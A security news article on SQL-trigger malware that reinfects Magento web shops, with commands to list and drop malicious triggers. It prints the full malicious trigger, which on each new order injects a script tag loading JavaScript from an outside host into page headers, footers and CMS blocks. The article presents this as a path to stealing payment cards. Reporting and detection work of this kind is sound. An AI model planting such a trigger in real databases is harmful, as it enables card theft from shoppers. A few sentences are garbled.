Security experts have discovered a new strain of malware that is targeted websites raising Russian the Magento eCommerce platform. The novelty is that this is the first a malware that hides the code in the website’s database is completely written in SQL.
The malware is triggered every time a user places a new order, the “SQL trigger” is then executed before the Magento platform even assembles the web page.
The researchers Willem de Groot that first analyzed the SQL malware discovered by Jeroen Boersma explained that this is a significant evolution on the threat landscape.
“The trigger is executed every time a new order is made. The query checks for the existence of the malware in the header, footer, copyright and every CMS block. If absent, it will re-add itself.” reads the blog post published by Willem de Groot.
“This discovery shows we have entered a new phase of malware evolution. Just scanning files is not enough anymore, malware detection methods should now include database analysis.”
The malware could be used to steal user payment card data belonging to the users of Magento eCommerce websites.
In order to discover the presence of the SQL malware, administrators have to inspect the database searching for suspicious SQL triggers such as containing admin, .js, script or < (html tags).
echo 'SHOW TRIGGERS' | n98-magerun db:console
Once discovered the malicious trigger it is possible to delete it with a command like the following one:
echo "DROP TRIGGER <trigger_name>" | n98-magerun db:console
According to the expert, SQL malware attacks starts with a brute force attack on
/rss/catalog/notifystock/ for an otherwise completely patched shop.
Below the pattern discovered by Jeroen Boersma:
TRIGGER `after_insert_order` AFTER INSERT ON `sales_flat_order` FOR EACH ROW BEGIN UPDATE core_config_data SET value = IF( value LIKE '%<script src="https://mage-storage.pw/cdn/flexible-min.js"></script>%', value, CONCAT(value, ' <script src="https://mage-storage.pw/cdn/flexible-min.js"></script>') ) WHERE path='design/head/includes' OR path='design/footer/absolute_footer' OR path='design/footer/copyright';\ UPDATE cms_block SET content= IF( content LIKE '%<script src="https://mage-storage.pw/cdn/flexible-min.js"></script>%', content, CONCAT(content, ' <script src="https://mage-storage.pw/cdn/flexible-min.js"></script>') ); END;
(Security Affairs – SQL malware , Magento)